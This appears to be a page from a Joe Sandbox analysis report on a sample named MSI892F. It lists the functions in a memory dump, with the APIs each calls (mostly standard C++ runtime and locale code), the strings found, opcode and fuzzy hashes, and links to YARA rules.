std::_Lockit::~_Lockit.LIBCPMT ref: 001A77F7

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 3e345a162a26eb80ea5dc913e490f3eaa9a18f31255d985d8d819d8eeac0155b
Instruction ID: 40c7dabb89e6b506003c15f32c8da8526ae4b2463a0a9d7b802401f303e491c4
Opcode Fuzzy Hash: 3e345a162a26eb80ea5dc913e490f3eaa9a18f31255d985d8d819d8eeac0155b
Instruction Fuzzy Hash: 28012279908219CBCF05FBA4D9456BEB775AFA1720F240409E511AB3C2CF709F01CB80

Function 001A780A Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7811
std::_Lockit::_Lockit.LIBCPMT ref: 001A781B

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

ctype.LIBCPMT ref: 001A7855
std::_Facet_Register.LIBCPMT ref: 001A786C
std::_Lockit::~_Lockit.LIBCPMT ref: 001A788C

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID:
API String ID: 83828444-0
Opcode ID: bf4108292a53286b4946d4201daae0966ff66c7cb187adf62c9d3838ef858758
Instruction ID: 78d7d00177e8e023b3a410c052f390701996c7e960d3c3a09f0aa35e0379ece3
Opcode Fuzzy Hash: bf4108292a53286b4946d4201daae0966ff66c7cb187adf62c9d3838ef858758
Instruction Fuzzy Hash: B301D2799082198BCF05EBA4E8456BEB775AFA1711F240409E411AB2D2DF749E01CB80

Function 001A789F Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A78A6
std::_Lockit::_Lockit.LIBCPMT ref: 001A78B0

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

messages.LIBCPMT ref: 001A78EA
std::_Facet_Register.LIBCPMT ref: 001A7901
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7921

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 6ac05c729121ee6f1c75401a1d2c3ffa383482850f2b4f0c345651ebd11c2680
Instruction ID: d05963d8f5136ba69f9dad754c6910059cf546b7e5c3bc88a3f294c773117b2a
Opcode Fuzzy Hash: 6ac05c729121ee6f1c75401a1d2c3ffa383482850f2b4f0c345651ebd11c2680
Instruction Fuzzy Hash: 3201D679904219CBCF04FB64D9456BEB765AFA1720F240409E511672D2DF749F01C780

Function 001B38C1 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B38C8
std::_Lockit::_Lockit.LIBCPMT ref: 001B38D2

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

collate.LIBCPMT ref: 001B390C
std::_Facet_Register.LIBCPMT ref: 001B3923
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3943

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: 8e75a1e7d15e9a1f79df6443ad3d06dcda114f92f8b06e219feac12344207750
Instruction ID: 3554331363192f5f38c97e3d2e27ec5a6614c1ce4ac59051e7f8bb84d021a22a
Opcode Fuzzy Hash: 8e75a1e7d15e9a1f79df6443ad3d06dcda114f92f8b06e219feac12344207750
Instruction Fuzzy Hash: 6301DE759042198BDF05EBA4D9456FEBBAAAFA0720F250009E521AB391DF70AF41CB80

Function 001A7934 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A793B
std::_Lockit::_Lockit.LIBCPMT ref: 001A7945

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

messages.LIBCPMT ref: 001A797F
std::_Facet_Register.LIBCPMT ref: 001A7996
std::_Lockit::~_Lockit.LIBCPMT ref: 001A79B6

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 23c156a95bb588abcd57187b1bca9c8507f3bb9d88aed408714adc1ca2cb6766
Instruction ID: 797ca85f3f6c27f2107a39544fa0cbebd99604188cc40ffe49d9b607f5548520
Opcode Fuzzy Hash: 23c156a95bb588abcd57187b1bca9c8507f3bb9d88aed408714adc1ca2cb6766
Instruction Fuzzy Hash: 2501D2799086198BCF04EB64D9456BFB7AAAFA1724F25040AE511AB3D1CF709F01CB91

Function 001B3956 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B395D
std::_Lockit::_Lockit.LIBCPMT ref: 001B3967

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

messages.LIBCPMT ref: 001B39A1
std::_Facet_Register.LIBCPMT ref: 001B39B8
std::_Lockit::~_Lockit.LIBCPMT ref: 001B39D8

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: 39a2725473111c923869f27406b1b10df005a32b7cb6775ddb30b29fb9655343
Instruction ID: 19b97a725469819b2b261696d555e9bd15bffd0e8f01f15c04e9f2d829560e26
Opcode Fuzzy Hash: 39a2725473111c923869f27406b1b10df005a32b7cb6775ddb30b29fb9655343
Instruction Fuzzy Hash: A501F5759042199BCF04FB64D9466FEB775EFA1720F250409E421AB391DF709F01CB80

Function 001B3B15 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B3B1C
std::_Lockit::_Lockit.LIBCPMT ref: 001B3B26

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001B3B60
std::_Facet_Register.LIBCPMT ref: 001B3B77
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3B97

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: d855ee7283cbe195413c7be87eda38cccf2b079a898c99cc9090b9a144ad0e5d
Instruction ID: 331b24735aadfbd35e8aa876f296f0a09f7d118e18add43d33b101c8ef9f9148
Opcode Fuzzy Hash: d855ee7283cbe195413c7be87eda38cccf2b079a898c99cc9090b9a144ad0e5d
Instruction Fuzzy Hash: C201D239944219DBCF04FB64D9456FEB775AFA0720F250009E425AB392CF349E01CB80

Function 001B3BAA Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B3BB1
std::_Lockit::_Lockit.LIBCPMT ref: 001B3BBB

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001B3BF5
std::_Facet_Register.LIBCPMT ref: 001B3C0C
std::_Lockit::~_Lockit.LIBCPMT ref: 001B3C2C

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: f1000855e9ee6b62933a24dcfeeb68dd3ea033692d1b0321f8d6696c28ec8eac
Instruction ID: e4f70c156d781f9a5ed0e4038e391926ed3934355af43cdcc02a3167b701054b
Opcode Fuzzy Hash: f1000855e9ee6b62933a24dcfeeb68dd3ea033692d1b0321f8d6696c28ec8eac
Instruction Fuzzy Hash: 1701D279904219DBCF04FBA4D9456FEBBA5AFA0710F25040AF515AB292CF709F41CB80

Function 001A7C1D Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7C24
std::_Lockit::_Lockit.LIBCPMT ref: 001A7C2E

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001A7C68
std::_Facet_Register.LIBCPMT ref: 001A7C7F
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7C9F

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: d2aa5143b7c54e34f639806d3098f0cd7ea99cff03dc49faaec9ac05958f7087
Instruction ID: a7c8884c670b71f67b3fe71d80eef6a48cbc834c8b2b578522cf68ca57550295
Opcode Fuzzy Hash: d2aa5143b7c54e34f639806d3098f0cd7ea99cff03dc49faaec9ac05958f7087
Instruction Fuzzy Hash: 6601D6399042198BCF14FB64DD456BEB775AFA1720F150409E411A73D2CF349E45C7C0

Function 001A7CB2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7CB9
std::_Lockit::_Lockit.LIBCPMT ref: 001A7CC3

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001A7CFD
std::_Facet_Register.LIBCPMT ref: 001A7D14
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7D34

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: e225993c1c5cfc1084a4c2c530760154bd3cccf913ecda93999aa741c62ac055
Instruction ID: 5465ad16d71de25a134f9b00b0a5b69a0072bacdaa72af90c5d8c679082bbf2e
Opcode Fuzzy Hash: e225993c1c5cfc1084a4c2c530760154bd3cccf913ecda93999aa741c62ac055
Instruction Fuzzy Hash: 5A01D2799086199BCF04FBA4D9456BEB765BFA5720F240409E911AB3D2DF749F01CBC0

Function 001A7D47 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7D4E
std::_Lockit::_Lockit.LIBCPMT ref: 001A7D58

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001A7D92
std::_Facet_Register.LIBCPMT ref: 001A7DA9
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7DC9

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: b8012885c3f7cf6425ab81d075b84390ecd2050c99160bcf8f6421005ea09cea
Instruction ID: 662616d740863589873682766d15e771b471171a6817debd52ceed1c9bb775f3
Opcode Fuzzy Hash: b8012885c3f7cf6425ab81d075b84390ecd2050c99160bcf8f6421005ea09cea
Instruction Fuzzy Hash: 2C01D2399046198BCF05FBA4D955ABEB7B6AFA6720F250009E411AB3D2DF709F41CBC0

Function 001A7DDC Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001A7DE3
std::_Lockit::_Lockit.LIBCPMT ref: 001A7DED

Part of subcall function 0019BCE0: std::_Lockit::_Lockit.LIBCPMT ref: 0019BD10
Part of subcall function 0019BCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0019BD38

moneypunct.LIBCPMT ref: 001A7E27
std::_Facet_Register.LIBCPMT ref: 001A7E3E
std::_Lockit::~_Lockit.LIBCPMT ref: 001A7E5E

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
String ID:
API String ID: 419941038-0
Opcode ID: 94d51c5edea8fcd4b092f50f07f7ee7f35a599a4f1ecfb8367250c509246806c
Instruction ID: afcc9001f3c51720fec05633c886455d97b69205f67ccc19fd3fead8d91b5a95
Opcode Fuzzy Hash: 94d51c5edea8fcd4b092f50f07f7ee7f35a599a4f1ecfb8367250c509246806c
Instruction Fuzzy Hash: DD01DE399086199BCF04EB64D8456BEB7B6AFA5B20F24044AE511AB3D2DF709F01CB80

Function 001B782B Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7835
LeaveCriticalSection.KERNEL32(001F4AF8,?,?,00192627,001F571C,001DCCC0), ref: 001B7868
RtlWakeAllConditionVariable.NTDLL ref: 001B78DF
SetEvent.KERNEL32(?,00192627,001F571C,001DCCC0), ref: 001B78E9
ResetEvent.KERNEL32(?,00192627,001F571C,001DCCC0), ref: 001B78F5

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 4620e8de08341322e54092169b158bead9590f90226a000595da833c6751428c
Instruction ID: ed1cb448113198fddc7cc511581b3fe576c14c2564c2a65b9361e578139b8b14
Opcode Fuzzy Hash: 4620e8de08341322e54092169b158bead9590f90226a000595da833c6751428c
Instruction Fuzzy Hash: 81014472A46220DFC715AF18FD48AB53B65FB49711B05406BF91293B60CB705D81DBD8

Function 00196090 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 001960F4
GetLastError.KERNEL32 ref: 00196190

Part of subcall function 00191FC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,001D938D,000000FF,?,80070057,?,?,00000000,00000010,00191B09,?), ref: 00192040

LoadLibraryExW.KERNEL32(?,00000000,00000000,00000009,001EB2DC,00000001,00000000), ref: 0019614E

Strings

ntdll.dll, xrefs: 00196126

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
String ID: ntdll.dll
API String ID: 4113295189-2227199552
Opcode ID: a53100de6a69a83344a2caa3779c15ff6c7b99eee54c465921365a3a004546ce
Instruction ID: 01d056edac66a6ed5c574590cb437ee8b6a382bc1c65ca1c4ad8b2ca64c9b739
Opcode Fuzzy Hash: a53100de6a69a83344a2caa3779c15ff6c7b99eee54c465921365a3a004546ce
Instruction Fuzzy Hash: E131B271A006059BDB20DF68DC45BAEB7F8FF94710F14862EE425D72D1EB74A944CBA0

Function 001AD2C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001AD2C9

Part of subcall function 001A6FF9: _Maklocstr.LIBCPMT ref: 001A7019
Part of subcall function 001A6FF9: _Maklocstr.LIBCPMT ref: 001A7036
Part of subcall function 001A6FF9: _Maklocstr.LIBCPMT ref: 001A7053
Part of subcall function 001A6FF9: _Maklocchr.LIBCPMT ref: 001A7065
Part of subcall function 001A6FF9: _Maklocchr.LIBCPMT ref: 001A7078

_Mpunct.LIBCPMT ref: 001AD356
_Mpunct.LIBCPMT ref: 001AD370

Strings

$+xv, xrefs: 001AD37B

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 7d3b6dfabe262c7dd1335d18eda8a17daf5661c7f2698e13f3e90ad0f6399a74
Instruction ID: 09d1b1f3acd7635e6d173136a32ab058d47917f1e4f10228449835a952d68a9d
Opcode Fuzzy Hash: 7d3b6dfabe262c7dd1335d18eda8a17daf5661c7f2698e13f3e90ad0f6399a74
Instruction Fuzzy Hash: 3721AEB5804B526EDB25DF74949077BBEECBF1A700B04095AE09AC7A02D734EA01CB90

Function 001B4DF4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 001B4DFB
_Mpunct.LIBCPMT ref: 001B4E88
_Mpunct.LIBCPMT ref: 001B4EA2

Strings

$+xv, xrefs: 001B4EAD

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 2545e5a996c030d1f0990543a1257856caedb1c71e1db8d0f5fa260464db8488
Instruction ID: 93195a702e48154cf9b614b5fa3d8ca76434f6de0f0b7d6335069f03fe50b833
Opcode Fuzzy Hash: 2545e5a996c030d1f0990543a1257856caedb1c71e1db8d0f5fa260464db8488
Instruction Fuzzy Hash: F52190B1904B926FD725DF75C490B7BBEF8BB19700F04495AE099C7A42D734EA01CB90

Function 001BC012 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001BBFC3,00000000,?,001F4EA4,?,?,?,001BC166,00000004,InitializeCriticalSectionEx,001DF92C,InitializeCriticalSectionEx), ref: 001BC01F
GetLastError.KERNEL32(?,001BBFC3,00000000,?,001F4EA4,?,?,?,001BC166,00000004,InitializeCriticalSectionEx,001DF92C,InitializeCriticalSectionEx,00000000,?,001BBF1D), ref: 001BC029
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001BC051

Strings

api-ms-, xrefs: 001BC036

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000003.00000002.1709021592.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709217347.00000000001DD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709271563.00000000001F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1709403455.00000000001F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_190000_MSI892F.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 0f5d78bcccc4fa315a4de3a750076abb473f57b42bf1d686c368fd9baa56bd12
Instruction ID: 8faa95fbbf831a4fbacbf7b64514520b49092e45715818933060a21046bbf9b9
Opcode Fuzzy Hash: 0f5d78bcccc4fa315a4de3a750076abb473f57b42bf1d686c368fd9baa56bd12
Instruction Fuzzy Hash: 0EE04F74281208FBEF202B60FC46F993B599F20B55F244031FA0CE84E0DB61E992A6C4

Function 0019E350 Relevance: 6.4, APIs: 4, Instructions: 426COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 0019E3F0
_strcspn.LIBCMT ref: 0019E412
LocalFree.KERNEL32(?), ref: 0019E77B
LocalFree.KERNEL32(?), ref: 0019E7C3

Memory Dump Source

Source File: 00000003.00000002.1709064831.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

